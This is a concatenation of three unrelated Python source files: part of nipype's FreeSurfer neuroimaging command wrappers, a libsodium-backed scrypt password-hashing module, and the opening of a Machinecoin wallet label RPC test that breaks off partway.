stem_args = self.inputs.stem_template_args
if isdefined(stem_args):
args = tuple([getattr(self.inputs, arg) for arg in stem_args])
stem = stem % args
# Check if the DISPLAY variable is set -- should avoid crashes (might not?)
if not "DISPLAY" in os.environ:
raise RuntimeError("Graphics are not enabled -- cannot run tksurfer")
runtime.environ["_SNAPSHOT_STEM"] = stem
self._write_tcl_script()
runtime = super(SurfaceSnapshots, self)._run_interface(runtime)
# If a display window can't be opened, this will crash on
# aggregate_outputs. Let's try to parse stderr and raise a
# better exception here if that happened.
errors = ["surfer: failed, no suitable display found",
"Fatal Error in tksurfer.bin: could not open display"]
for err in errors:
if err in runtime.stderr:
self.raise_exception(runtime)
# Tksurfer always (or at least always when you run a tcl script)
# exits with a nonzero returncode. We have to force it to 0 here.
runtime.returncode = 0
return runtime
def _write_tcl_script(self):
fid = open("snapshots.tcl", "w")
script = ["save_tiff $env(_SNAPSHOT_STEM)-lat.tif",
"make_lateral_view",
"rotate_brain_y 180",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-med.tif",
"make_lateral_view",
"rotate_brain_x 90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-ven.tif",
"make_lateral_view",
"rotate_brain_x -90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-dor.tif"]
if isdefined(self.inputs.six_images) and self.inputs.six_images:
script.extend(["make_lateral_view",
"rotate_brain_y 90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-pos.tif",
"make_lateral_view",
"rotate_brain_y -90",
"redraw",
"save_tiff $env(_SNAPSHOT_STEM)-ant.tif"])
script.append("exit")
fid.write("\n".join(script))
fid.close()
def _list_outputs(self):
outputs = self._outputs().get()
if not isdefined(self.inputs.screenshot_stem):
stem = "%s_%s_%s" % (self.inputs.subject_id, self.inputs.hemi, self.inputs.surface)
else:
stem = self.inputs.screenshot_stem
stem_args = self.inputs.stem_template_args
if isdefined(stem_args):
args = tuple([getattr(self.inputs, arg) for arg in stem_args])
stem = stem % args
snapshots = ["%s-lat.tif", "%s-med.tif", "%s-dor.tif", "%s-ven.tif"]
if self.inputs.six_images:
snapshots.extend(["%s-pos.tif", "%s-ant.tif"])
snapshots = [self._gen_fname(f % stem, suffix="") for f in snapshots]
outputs["snapshots"] = snapshots
return outputs
def _gen_filename(self, name):
if name == "tcl_script":
return "snapshots.tcl"
return None
class ImageInfoInputSpec(FSTraitedSpec):
in_file = File(exists=True, position=1, argstr="%s", desc="image to query")
class ImageInfoOutputSpec(TraitedSpec):
info = traits.Any(desc="output of mri_info")
out_file = File(exists=True, desc="text file with image information")
data_type = traits.String(desc="image data type")
file_format = traits.String(desc="file format")
TE = traits.String(desc="echo time (msec)")
TR = traits.String(desc="repetition time(msec)")
TI = traits.String(desc="inversion time (msec)")
dimensions = traits.Tuple(desc="image dimensions (voxels)")
vox_sizes = traits.Tuple(desc="voxel sizes (mm)")
orientation = traits.String(desc="image orientation")
ph_enc_dir = traits.String(desc="phase encode direction")
class ImageInfo(FSCommand):
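"""Query image metadata using Freesurfer's mri_info.
Example
-------
A minimal usage sketch; the filename is a placeholder.
>>> import nipype.interfaces.freesurfer as fs
>>> info = fs.ImageInfo(in_file='structural.nii') # doctest: +SKIP
>>> res = info.run() # doctest: +SKIP
"""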
_cmd = "mri_info"
input_spec = ImageInfoInputSpec
output_spec = ImageInfoOutputSpec
def info_regexp(self, info, field, delim="\n"):
m = re.search("%s\s*:\s+(.+?)%s" % (field, delim), info)
if m:
return m.group(1)
else:
return None
def aggregate_outputs(self, runtime=None, needed_outputs=None):
outputs = self._outputs()
info = runtime.stdout
outputs.info = info
# Pulse sequence parameters
for field in ["TE", "TR", "TI"]:
fieldval = self.info_regexp(info, field, ", ")
if fieldval and fieldval.endswith(" msec"):
fieldval = fieldval[:-5]
setattr(outputs, field, fieldval)
# Voxel info
vox = self.info_regexp(info, "voxel sizes")
vox = tuple(vox.split(", "))
outputs.vox_sizes = vox
dim = self.info_regexp(info, "dimensions")
dim = tuple([int(d) for d in dim.split(" x ")])
outputs.dimensions = dim
outputs.orientation = self.info_regexp(info, "Orientation")
outputs.ph_enc_dir = self.info_regexp(info, "PhEncDir")
# File format and datatype are both keyed by "type"
ftype, dtype = re.findall(r"%s\s*:\s+(.+?)\n" % "type", info)
outputs.file_format = ftype
outputs.data_type = dtype
return outputs
class MRIsConvertInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
"""
annot_file = File(exists=True, argstr="--annot %s",
desc="input is annotation or gifti label data")
parcstats_file = File(exists=True, argstr="--parcstats %s",
desc="infile is name of text file containing label/val pairs")
label_file = File(exists=True, argstr="--label %s",
desc="infile is .label file, label is name of this label")
scalarcurv_file = File(exists=True, argstr="-c %s",
desc="input is scalar curv overlay file (must still specify surface)")
functional_file = File(exists=True, argstr="-f %s",
desc="input is functional time-series or other multi-frame data (must specify surface)")
labelstats_outfile = File(exists=False, argstr="--labelstats %s",
desc="outfile is name of gifti file to which label stats will be written")
patch = traits.Bool(argstr="-p", desc="input is a patch, not a full surface")
rescale = traits.Bool(argstr="-r", desc="rescale vertex xyz so total area is same as group average")
normal = traits.Bool(argstr="-n", desc="output is an ascii file where vertex data")
xyz_ascii = traits.Bool(argstr="-a", desc="Print only surface xyz to ascii file")
vertex = traits.Bool(argstr="-v", desc="Writes out neighbors of a vertex in each row")
scale = traits.Float(argstr="-s %.3f", desc="scale vertex xyz by scale")
dataarray_num = traits.Int(argstr="--da_num %d", desc="if input is gifti, 'num' specifies which data array to use")
talairachxfm_subjid = traits.String(argstr="-t %s", desc="apply talairach xfm of subject to vertex xyz")
origname = traits.String(argstr="-o %s", desc="read orig positions")
in_file = File(exists=True, mandatory=True, position=-2, argstr='%s', desc='File to read/convert')
out_file = File(argstr='./%s', position=-1, genfile=True, desc='output filename or True to generate one')
#Not really sure why the ./ is necessary but the module fails without it
out_datatype = traits.Enum("ico", "tri", "stl", "vtk", "gii", "mgh", "mgz", mandatory=True,
desc="These file formats are supported: ASCII: .asc" \
"ICO: .ico, .tri GEO: .geo STL: .stl VTK: .vtk GIFTI: .gii MGH surface-encoded 'volume': .mgh, .mgz")
class MRIsConvertOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
"""
converted = File(exists=True, desc='converted output surface')
class MRIsConvert(FSCommand):
"""
Uses Freesurfer's mris_convert to convert surface files to various formats
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> mris = fs.MRIsConvert()
>>> mris.inputs.in_file = 'lh.pial'
>>> mris.inputs.out_datatype = 'gii'
>>> mris.run() # doctest: +SKIP
"""
_cmd = 'mris_convert'
input_spec = MRIsConvertInputSpec
output_spec = MRIsConvertOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs["converted"] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.annot_file):
_, name, ext = split_filename(self.inputs.annot_file)
elif isdefined(self.inputs.parcstats_file):
_, name, ext = split_filename(self.inputs.parcstats_file)
elif isdefined(self.inputs.label_file):
_, name, ext = split_filename(self.inputs.label_file)
elif isdefined(self.inputs.scalarcurv_file):
_, name, ext = split_filename(self.inputs.scalarcurv_file)
elif isdefined(self.inputs.functional_file):
_, name, ext = split_filename(self.inputs.functional_file)
elif isdefined(self.inputs.in_file):
_, name, ext = split_filename(self.inputs.in_file)
return name + ext + "_converted." + self.inputs.out_datatype
class MRITessellateInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
"""
in_file = File(exists=True, mandatory=True, position=-3, argstr='%s', desc='Input volume to tessellate voxels from.')
label_value = traits.Int(position=-2, argstr='%d', mandatory=True,
desc='Label value to tessellate from the input volume (integer; if input is "filled.mgz" volume, 127 is rh, 255 is lh)')
out_file = File(argstr='./%s', position=-1, genfile=True, desc='output filename or True to generate one')
tesselate_all_voxels = traits.Bool(argstr='-a', desc='Tessellate the surface of all voxels with different labels')
use_real_RAS_coordinates = traits.Bool(argstr='-n', desc='Saves surface with real RAS coordinates where c_(r,a,s) != 0')
class MRITessellateOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
"""
surface = File(exists=True, desc='binary surface of the tessellation ')
class MRITessellate(FSCommand):
"""
Uses Freesurfer's mri_tessellate to create surfaces by tessellating a given input volume
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> tess = fs.MRITessellate()
>>> tess.inputs.in_file = 'aseg.mgz'
>>> tess.inputs.label_value = 17
>>> tess.inputs.out_file = 'lh.hippocampus'
>>> tess.run() # doctest: +SKIP
"""
_cmd = 'mri_tessellate'
input_spec = MRITessellateInputSpec
output_spec = MRITessellateOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return self.inputs.out_file
else:
_, name, ext = split_filename(self.inputs.in_file)
return name + ext + '_' + str(self.inputs.label_value)
class MRIPretessInputSpec(FSTraitedSpec):
in_filled = File(exists=True, mandatory=True, position=-4, argstr='%s',
desc=('filled volume, usually wm.mgz'))
label = traits.Either(traits.Str('wm'), traits.Int(1), argstr='%s', default='wm',
mandatory=True, usedefault=True, position=-3,
desc=('label to be picked up, can be a Freesurfer\'s string like '
'\'wm\' or a label value (e.g. 127 for rh or 255 for lh)'))
in_norm = File(exists=True, mandatory=True, position=-2, argstr='%s',
desc=('the normalized, brain-extracted T1w image. Usually norm.mgz'))
out_file = File(position=-1, argstr='%s', genfile=True,
desc=('the output file after mri_pretess.'))
nocorners = traits.Bool(False, argstr='-nocorners', desc=('do not remove corner configurations'
' in addition to edge ones.'))
keep = traits.Bool(False, argstr='-keep', desc=('keep WM edits'))
test = traits.Bool(False, argstr='-test', desc=('adds a voxel that should be removed by '
'mri_pretess. The value of the voxel is set to that of an ON-edited WM, '
'so it should be kept with -keep. The output will NOT be saved.'))
class MRIPretessOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='output file after mri_pretess')
class MRIPretess(FSCommand):
"""
Uses Freesurfer's mri_pretess to prepare volumes to be tessellated.
Description
-----------
Changes white matter (WM) segmentation so that the neighbors of all
voxels labeled as WM have a face in common - no edges or corners
allowed.
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> pretess = fs.MRIPretess()
>>> pretess.inputs.in_filled = 'wm.mgz'
>>> pretess.inputs.in_norm = 'norm.mgz'
>>> pretess.inputs.nocorners = True
>>> pretess.cmdline
'mri_pretess -nocorners wm.mgz wm norm.mgz wm_pretesswm.mgz'
>>> pretess.run() # doctest: +SKIP
"""
_cmd = 'mri_pretess'
input_spec = MRIPretessInputSpec
output_spec = MRIPretessOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['out_file'] = os.path.abspath(self._gen_outfilename())
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return self.inputs.out_file
else:
_, name, ext = split_filename(self.inputs.in_filled)
return name + '_pretess' + str(self.inputs.label) + ext
class MRIMarchingCubesInputSpec(FSTraitedSpec):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
"""
in_file = File(exists=True, mandatory=True, position=1, argstr='%s', desc='Input volume to tessellate voxels from.')
label_value = traits.Int(position=2, argstr='%d', mandatory=True,
desc='Label value to tessellate from the input volume (integer; if input is "filled.mgz" volume, 127 is rh, 255 is lh)')
connectivity_value = traits.Int(1, position=-1, argstr='%d', usedefault=True,
desc='Alter the marching cubes connectivity: 1=6+,2=18,3=6,4=26 (default=1)')
out_file = File(argstr='./%s', position=-2, genfile=True, desc='output filename or True to generate one')
class MRIMarchingCubesOutputSpec(TraitedSpec):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
"""
surface = File(exists=True, desc='binary surface of the tessellation ')
class MRIMarchingCubes(FSCommand):
"""
Uses Freesurfer's mri_mc to create surfaces by tessellating a given input volume
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> mc = fs.MRIMarchingCubes()
>>> mc.inputs.in_file = 'aseg.mgz'
>>> mc.inputs.label_value = 17
>>> mc.inputs.out_file = 'lh.hippocampus'
>>> mc.run() # doctest: +SKIP
"""
_cmd = 'mri_mc'
input_spec = MRIMarchingCubesInputSpec
output_spec = MRIMarchingCubesOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = self._gen_outfilename()
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + ext + '_' + str(self.inputs.label_value))
class SmoothTessellationInputSpec(FSTraitedSpec):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
"""
in_file = File(exists=True, mandatory=True, argstr='%s', position=1, desc='Input surface file to smooth.')
curvature_averaging_iterations = traits.Int(10, usedefault=True, argstr='-a %d', position=-1, desc='Number of curvature averaging iterations (default=10)')
smoothing_iterations = traits.Int(10, usedefault=True, argstr='-n %d', position=-2, desc='Number of smoothing iterations (default=10)')
snapshot_writing_iterations = traits.Int(argstr='-w %d', desc='Write snapshot every "n" iterations')
use_gaussian_curvature_smoothing = traits.Bool(argstr='-g', position=3, desc='Use Gaussian curvature smoothing')
gaussian_curvature_norm_steps = traits.Int(argstr='%d ', position=4, desc='Use Gaussian curvature smoothing')
gaussian_curvature_smoothing_steps = traits.Int(argstr='%d', position=5, desc='Use Gaussian curvature smoothing')
disable_estimates = traits.Bool(argstr='-nw', desc='Disables the writing of curvature and area estimates')
normalize_area = traits.Bool(argstr='-area', desc='Normalizes the area after smoothing')
use_momentum = traits.Bool(argstr='-m', desc='Uses momentum')
out_file = File(argstr='%s', position=2, genfile=True, desc='output filename or True to generate one')
out_curvature_file = File(argstr='-c %s', desc='Write curvature to ?h.curvname (default "curv")')
out_area_file = File(argstr='-b %s', desc='Write area to ?h.areaname (default "area")')
class SmoothTessellationOutputSpec(TraitedSpec):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
"""
surface = File(exists=True, desc='Smoothed surface file ')
class SmoothTessellation(FSCommand):
"""
This program smooths the tessellation of a surface using 'mris_smooth'
.. seealso::
SurfaceSmooth() Interface
For smoothing a scalar field along a surface manifold
Example
-------
>>> import nipype.interfaces.freesurfer as fs
>>> smooth = fs.SmoothTessellation()
>>> smooth.inputs.in_file = 'lh.hippocampus.stl'
>>> smooth.run() # doctest: +SKIP
"""
_cmd = 'mris_smooth'
input_spec = SmoothTessellationInputSpec
output_spec = SmoothTessellationOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['surface'] = self._gen_outfilename()
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._gen_outfilename()
else:
return None
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + '_smoothed' + ext)
def _run_interface(self, runtime):
# The returncode from mris_smooth is not a reliable indicator of
# success here, so check stderr and raise if the command reported
# a failure.
runtime = super(SmoothTessellation, self)._run_interface(runtime)
if "failed" in runtime.stderr:
self.raise_exception(runtime)
return runtime
class MakeAverageSubjectInputSpec(FSTraitedSpec):
subjects_ids = traits.List(traits.Str(), argstr='--subjects %s',
desc='freesurfer subjects ids to average',
mandatory=True, sep=' ')
out_name = File('average', argstr='--out %s',
desc='name for the average subject', usedefault=True)
class MakeAverageSubjectOutputSpec(TraitedSpec):
average_subject_name = traits.Str(desc='name of the average subject')
class MakeAverageSubject(FSCommand):
"""Make an average freesurfer subject
Examples
--------
>>> from nipype.interfaces.freesurfer import MakeAverageSubject
>>> avg = MakeAverageSubject(subjects_ids=['s1', 's2'])
>>> avg.cmdline
'make_average_subject --out average --subjects s1 s2'
"""
_cmd = 'make_average_subject'
input_spec = MakeAverageSubjectInputSpec
output_spec = MakeAverageSubjectOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outputs['average_subject_name'] = self.inputs.out_name
return outputs
class ExtractMainComponentInputSpec(CommandLineInputSpec):
in_file = File(exists=True, mandatory=True, argstr='%s', position=1,
desc='input surface file')
out_file = File(name_template='%s.maincmp', name_source='in_file',
argstr='%s', position=2,
desc='surface containing main component')
class ExtractMainComponentOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='surface containing main component')
class ExtractMainComponent(CommandLine):
"""Extract the main component of a tesselated surface
Examples
--------
>>> from nipype.interfaces.freesurfer import ExtractMainComponent
>>> mcmp = ExtractMainComponent(in_file='lh.pial')
>>> mcmp.cmdline
'mris_extract_main_component lh.pial lh.maincmp'
"""
_cmd = 'mris_extract_main_component'
input_spec = ExtractMainComponentInputSpec
output_spec = ExtractMainComponentOutputSpec
class Tkregister2InputSpec(FSTraitedSpec):
target_image = File(exists=True, argstr="--targ %s",
xor=['fstarg'],
desc='target volume')
fstarg = traits.Bool(False, argstr='--fstarg',
xor=['target_image'],
desc='use subject\'s T1 as reference')
moving_image = File(exists=True, mandatory=True, argstr="--mov %s",
desc='moving volume')
fsl_in_matrix = File(exists=True, argstr="--fsl %s",
desc='fsl-style registration input matrix')
subject_id = traits.String(argstr="--s %s",
desc='freesurfer subject ID')
noedit = traits.Bool(True, argstr="--noedit", usedefault=True,
desc='do not open edit window (exit)')
reg_file = File('register.dat', usedefault=True,
mandatory=True, argstr='--reg %s',
desc='freesurfer-style registration file')
reg_header = traits.Bool(False, argstr='--regheader',
desc='compute registration from headers')
fstal = traits.Bool(False, argstr='--fstal',
xor=['target_image', 'moving_image'],
desc='set mov to be tal and reg to be tal xfm')
movscale = traits.Float(argstr='--movscale %f',
desc='adjust registration matrix to scale mov')
xfm = File(exists=True, argstr='--xfm %s',
desc='use a matrix in MNI coordinates as initial registration')
fsl_out = File(argstr='--fslregout %s',
desc='compute an FSL-compatible registration matrix')
class Tkregister2OutputSpec(TraitedSpec):
reg_file = File(exists=True, desc='freesurfer-style registration file')
fsl_file = File(desc='FSL-style registration file')
class Tkregister2(FSCommand):
"""
Examples
--------
Get transform matrix between orig (*tkRAS*) and native (*scannerRAS*)
coordinates in Freesurfer. Implements the first step of mapping surfaces
to native space in `this guide
<http://surfer.nmr.mgh.harvard.edu/fswiki/FsAnat-to-NativeAnat>`_.
>>> from nipype.interfaces.freesurfer import Tkregister2
>>> tk2 = Tkregister2(reg_file='T1_to_native.dat')
>>> tk2.inputs.moving_image = 'T1.mgz'
>>> tk2.inputs.target_image = 'structural.nii'
>>> tk2.inputs.reg_header = True
>>> tk2.cmdline
'tkregister2 --mov T1.mgz --noedit --reg T1_to_native.dat --regheader \
--targ structural.nii'
>>> tk2.run() # doctest: +SKIP
The example below uses tkregister2 without the manual editing
stage to convert FSL-style registration matrix (.mat) to
FreeSurfer-style registration matrix (.dat)
>>> from nipype.interfaces.freesurfer import Tkregister2
>>> tk2 = Tkregister2()
>>> tk2.inputs.moving_image = 'epi.nii'
>>> tk2.inputs.fsl_in_matrix = 'flirt.mat'
>>> tk2.cmdline
'tkregister2 --fsl flirt.mat --mov epi.nii --noedit --reg register.dat'
>>> tk2.run() # doctest: +SKIP
"""
_cmd = "tkregister2"
input_spec = Tkregister2InputSpec
output_spec = Tkregister2OutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
outputs['reg_file'] = os.path.abspath(self.inputs.reg_file)
if isdefined(self.inputs.fsl_out):
outputs['fsl_file'] = op.abspath(self.inputs.fsl_out)
return outputs
def _gen_outfilename(self):
if isdefined(self.inputs.out_file):
return os.path.abspath(self.inputs.out_file)
else:
_, name, ext = split_filename(self.inputs.in_file)
return os.path.abspath(name + '_smoothed' + ext)
|
|
# Copyright (c) 2014-2021, Jan Varho
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Scrypt implementation that calls into system libsodium"""
import ctypes
from ctypes import c_char_p, c_size_t, c_uint64, c_uint32, c_void_p
from . import mcf as mcf_mod
from . import libsodium_load
from .common import (
SCRYPT_N, SCRYPT_r, SCRYPT_p, SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_s1,
SCRYPT_MCF_PREFIX_DEFAULT, SCRYPT_MCF_PREFIX_ANY, check_args)
from . import pypyscrypt_inline as scr_mod
_lib = libsodium_load.get_libsodium()
if _lib is None:
raise ImportError('Unable to load libsodium')
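# Probe the loaded libsodium for a usable scrypt interface: prefer the
# low-level crypto_pwhash_scryptsalsa208sha256_ll entry point when it is
# exported, and otherwise fall back to the high-level password-hashing
# functions (including the alternatively named crypto_pwhash_scryptx*
# variants found in some builds).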
try:
_scrypt_ll = _lib.crypto_pwhash_scryptsalsa208sha256_ll
_scrypt_ll.argtypes = [
c_void_p, # passwd
c_size_t, # passwdlen
c_void_p, # salt
c_size_t, # saltlen
c_uint64, # N
c_uint32, # r
c_uint32, # p
c_void_p, # buf
c_size_t, # buflen
]
except AttributeError:
_scrypt_ll = None
try:
_scrypt = _lib.crypto_pwhash_scryptsalsa208sha256
_scrypt_str = _lib.crypto_pwhash_scryptsalsa208sha256_str
_scrypt_str_chk = _lib.crypto_pwhash_scryptsalsa208sha256_str_verify
_scrypt_str_bytes = _lib.crypto_pwhash_scryptsalsa208sha256_strbytes()
_scrypt_salt = _lib.crypto_pwhash_scryptsalsa208sha256_saltbytes()
if _scrypt_str_bytes != 102 and not _scrypt_ll:
raise ImportError('Incompatible libsodium')
except AttributeError:
try:
_scrypt = _lib.crypto_pwhash_scryptxsalsa208sha256
_scrypt_str = _lib.crypto_pwhash_scryptxsalsa208sha256_str
_scrypt_str_chk = _lib.crypto_pwhash_scryptxsalsa208sha256_str_verify
_scrypt_str_bytes = _lib.crypto_pwhash_scryptxsalsa208sha256_strbytes()
_scrypt_salt = _lib.crypto_pwhash_scryptxsalsa208sha256_saltbytes
_scrypt_salt = _scrypt_salt()
if _scrypt_str_bytes != 102 and not _scrypt_ll:
raise ImportError('Incompatible libsodium')
except AttributeError:
if not _scrypt_ll:
raise ImportError('Incompatible libsodium')
_scrypt.argtypes = [
c_void_p, # out
c_uint64, # outlen
c_void_p, # passwd
c_uint64, # passwdlen
c_void_p, # salt
c_uint64, # opslimit
c_size_t, # memlimit
]
_scrypt_str.argtypes = [
c_void_p, # out (102 bytes)
c_void_p, # passwd
c_uint64, # passwdlen
c_uint64, # opslimit
c_size_t, # memlimit
]
_scrypt_str_chk.argtypes = [
c_char_p, # str (102 bytes)
c_void_p, # passwd
c_uint64, # passwdlen
]
def scrypt(password, salt, N=SCRYPT_N, r=SCRYPT_r, p=SCRYPT_p, olen=64):
"""Returns a key derived using the scrypt key-derivarion function
N must be a power of two larger than 1 but no larger than 2 ** 63 (insane)
r and p must be positive numbers such that r * p < 2 ** 30
The default values are:
N -- 2**14 (~16k)
r -- 8
p -- 1
Memory usage is proportional to N*r. Defaults require about 16 MiB.
Time taken is proportional to N*p. Defaults take <100ms on a recent x86.
The last one differs from libscrypt defaults, but matches the 'interactive'
work factor from the original paper. For long term storage where runtime of
key derivation is not a problem, you could use 16 as in libscrypt or better
yet increase N if memory is plentiful.
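As a worked example, scrypt needs roughly 128*r*N bytes of memory, so
N=2**20 with the default r=8 uses about 1 GiB, while raising p adds
computation time without adding memory.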
"""
check_args(password, salt, N, r, p, olen)
if _scrypt_ll:
out = ctypes.create_string_buffer(olen)
if _scrypt_ll(password, len(password), salt, len(salt),
N, r, p, out, olen):
raise ValueError
return out.raw
if len(salt) != _scrypt_salt or r != 8 or (p & (p - 1)) or (N*p <= 512):
return scr_mod.scrypt(password, salt, N, r, p, olen)
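# libsodium's high-level API takes (opslimit, memlimit) instead of
# (N, r, p). With r=8, memory use is 128*N*r = N*2**10 bytes, and
# opslimit is set to 32*N*p = 2**(5+s+t); these values should make
# libsodium's parameter picker recover exactly N=2**s, r=8, p=2**t
# (the assert in scrypt_mcf() below checks that round trip for the
# MCF path).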
s = next(i for i in range(1, 64) if 2**i == N)
t = next(i for i in range(0, 30) if 2**i == p)
m = 2**(10 + s)
o = 2**(5 + t + s)
if s > 53 or t + s > 58:
raise ValueError
out = ctypes.create_string_buffer(olen)
if _scrypt(out, olen, password, len(password), salt, o, m) != 0:
raise ValueError
return out.raw
def scrypt_mcf(password, salt=None, N=SCRYPT_N, r=SCRYPT_r, p=SCRYPT_p,
prefix=SCRYPT_MCF_PREFIX_DEFAULT):
"""Derives a Modular Crypt Format hash using the scrypt KDF
Parameter space is smaller than for scrypt():
N must be a power of two larger than 1 but no larger than 2 ** 31
r and p must be positive numbers between 1 and 255
Salt must be a byte string 1-16 bytes long.
If no salt is given, a random salt of 128+ bits is used. (Recommended.)
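A usage sketch (the hash is salted, so the output is not reproducible here):
>>> h = scrypt_mcf(b'password') # doctest: +SKIP
>>> scrypt_mcf_check(h, b'password') # doctest: +SKIP
True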
"""
if isinstance(password, str):
password = password.encode('utf8')
elif not isinstance(password, bytes):
raise TypeError('password must be a unicode or byte string')
if N < 2 or (N & (N - 1)):
raise ValueError('scrypt N must be a power of 2 greater than 1')
if p > 255 or p < 1:
raise ValueError('scrypt_mcf p out of range [1,255]')
if N > 2**31:
raise ValueError('scrypt_mcf N out of range [2,2**31]')
if (salt is not None or r != 8 or (p & (p - 1)) or (N*p <= 512) or
prefix not in (SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_s1,
SCRYPT_MCF_PREFIX_ANY) or
_scrypt_ll):
return mcf_mod.scrypt_mcf(scrypt, password, salt, N, r, p, prefix)
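# Same (N, r, p) -> (opslimit, memlimit) mapping as in scrypt() above.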
s = next(i for i in range(1, 32) if 2**i == N)
t = next(i for i in range(0, 8) if 2**i == p)
m = 2**(10 + s)
o = 2**(5 + t + s)
mcf = ctypes.create_string_buffer(102)
if _scrypt_str(mcf, password, len(password), o, m) != 0:
return mcf_mod.scrypt_mcf(scrypt, password, salt, N, r, p, prefix)
if prefix in (SCRYPT_MCF_PREFIX_7, SCRYPT_MCF_PREFIX_ANY):
return mcf.raw.strip(b'\0')
_N, _r, _p, salt, hash, _olen = mcf_mod._scrypt_mcf_decode_7(mcf.raw[:-1])
assert _N == N and _r == r and _p == p, (_N, _r, _p, N, r, p, o, m)
return mcf_mod._scrypt_mcf_encode_s1(N, r, p, salt, hash)
def scrypt_mcf_check(mcf, password):
"""Returns True if the password matches the given MCF hash"""
if isinstance(password, str):
password = password.encode('utf8')
elif not isinstance(password, bytes):
raise TypeError('password must be a unicode or byte string')
if not isinstance(mcf, bytes):
raise TypeError('MCF must be a byte string')
if mcf_mod._scrypt_mcf_7_is_standard(mcf) and not _scrypt_ll:
return _scrypt_str_chk(mcf, password, len(password)) == 0
return mcf_mod.scrypt_mcf_check(scrypt, mcf, password)
if __name__ == "__main__":
import sys
from . import tests
try:
from . import pylibscrypt
scr_mod = pylibscrypt
except ImportError:
pass
tests.run_scrypt_suite(sys.modules[__name__])
|
|
#!/usr/bin/env python3
# Copyright (c) 2016-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test label RPCs.
RPCs tested are:
- getaccountaddress
- getaddressesbyaccount/getaddressesbylabel
- listaddressgroupings
- setlabel
- sendfrom (with account arguments)
- move (with account arguments)
Run the test twice - once using the accounts API and once using the labels API.
The accounts API test can be removed in V0.18.
"""
from collections import defaultdict
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class WalletLabelsTest(MachinecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-deprecatedrpc=accounts'], []]
def setup_network(self):
"""Don't connect nodes."""
self.setup_nodes()
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
"""Run the test twice - once using the accounts API and once using the labels API."""
self.log.info("Test accounts API")
self._run_subtest(True, self.nodes[0])
self.log.info("Test labels API")
self._run_subtest(False, self.nodes[1])
def _run_subtest(self, accounts_api, node):
# Check that there's no UTXO on any of the nodes
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generate(1)
node.generate(101)
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Machinecoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 2)
assert_equal(address_group[0][1], 50)
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
# There's some fee that will come back to us when the miner reward
# matures.
